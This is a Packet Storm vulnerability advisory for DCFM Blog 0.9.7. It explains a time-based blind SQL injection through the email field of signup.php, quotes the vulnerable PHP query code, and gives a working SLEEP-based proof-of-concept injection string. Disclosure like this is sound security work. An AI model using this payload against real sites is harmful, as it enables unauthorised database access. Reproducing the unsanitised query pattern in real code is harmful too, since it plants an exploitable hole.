DCFM Blog 0.9.7 Blind SQL Injection

2016-11-17T00:00:00
ID PACKETSTORM:139774
Type packetstorm
Reporter N_A
Modified 2016-11-17T00:00:00

Description

                                        
                                            `DCFM Blog Version 0.9.7 Blind SQL Injection Vulnerability ( time based-attack )  
================================================================================  
  
  
  
Discovered by N_A , N_A[at]tutanota.com  
========================================  
  
  
  
  
Description  
============  
  
Open-source blog project. Free blog system for any website. Uses MySQL and PHP 5. Very easily customizable and incredibly flexible.  
  
https://sourceforge.net/projects/dcfm-blog/  
  
  
  
  
Vulnerability  
==============  
  
A blind SQL Injection is possible within the signup.php file of DCFM Blog version 0.9.7.  
  
  
  
$desuser = $_POST['desuser'];  
$despass = $_POST['despass'];  
$email = $_POST['email']; <---- The vulnerable variable  
$firstname = $_POST['firstname'];  
$lastname = $_POST['lastname'];  
$submitted = $_POST['submitted'];  
$despassconfirm = $_POST['despassconfirm'];  
  
  
  
The $email variable is not properly checked as the regex does not stop additional characters from being added once the variable matches a valid email format:  
  
if(!ereg("^.+@.+\\..+$",$email)) {  
$evil = 1;  
$error="<p>  
The highlighted fields are not filled out correctly.  
</p>";   
  
  
  
the '.+' part of the regular expression will match "one or more of any character" . It is then possible to attached a crafted SQL Injection string to the end of the $email variable.  
  
The crafted string is fed directly into the MySql database:  
  
$result = mysql_query("SELECT * FROM accounts  
WHERE Email='$_POST[email]'");  
while($row = mysql_fetch_array($result)) {  
if ($email == $row['Email'])  
  
  
  
  
  
  
Proof Of Concept Exploit String  
================================  
  
  
  
Fill out the whole form and input the email variable as follows:  
  
jimmy@site.com' AND (SELECT * FROM (SELECT(SLEEP(5)))MXKf) AND 'dBWQ'='dBWQ  
  
  
  
  
  
Email  
=====  
  
N_A[at]tutanota.com  
`